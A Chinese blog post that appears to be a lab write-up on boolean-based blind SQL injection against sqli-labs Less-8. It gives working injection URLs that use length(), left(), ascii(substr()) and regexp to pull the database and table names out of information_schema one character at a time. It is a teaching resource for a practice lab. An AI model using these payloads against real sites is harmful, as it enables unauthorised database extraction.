sqli-lab 布尔注入

ppt来自传送门
小技巧
在这里插入图片描述
以下环境为sqli-labs第8关

其实可以将布尔盲注理解为一个猜单词的游戏
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

小技巧
substr((select database()).1.1)=‘s’ 和 ascii(substr(select database()),1,1))=115的区别
建议使用ascii(substr(select database()),1,1))=115,因为在某些注入场景中‘s’中带有引号,往往会被转义。所以在使用各种函数进行猜着盲注的时候,可以尝试使用ascii()来进行注入。

利用布尔盲注的思路,先猜数据库的长度,再逐一猜出全名。
在这里插入图片描述

http://sqli-labs:65/Less-8/?id=1' and length(database())>=9--+

以上可以利用二分法依次猜出数据库的长度

1.爆数据库

http://sqli-labs:65/Less-8/?id=1' and left((select database()),1)='s'--+

在这里插入图片描述

http://sqli-labs:65/Less-8/?id=1' and left((select database()),1)='a'--+则无回显

在这里插入图片描述
2.爆表

http://sqli-labs:65/Less-8/?id=1' and left((select table_name from information_schema.tables where table_schema='security' limit 0,1),1)='e'--+

==然后一次更改limit 的参数可以推测出 表email
在这里插入图片描述

另一种形式

1.爆数据库(得知== 默认数据库为 security==)

http://sqli-labs:65/Less-8/?id=1' and (select database()) regexp '^s'--+

在这里插入图片描述

http://sqli-labs:65/Less-8/?id=1' and (select table_name from information_schema.tables where table_schema=database() limit 0,1) regexp '^s'--+

在这里插入图片描述
在这里不妨用bp进行爆破
注意 regexp 不用频繁修改limit 的参数,始终为1就好。(不像left(),每次都要修改相应的参数)

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值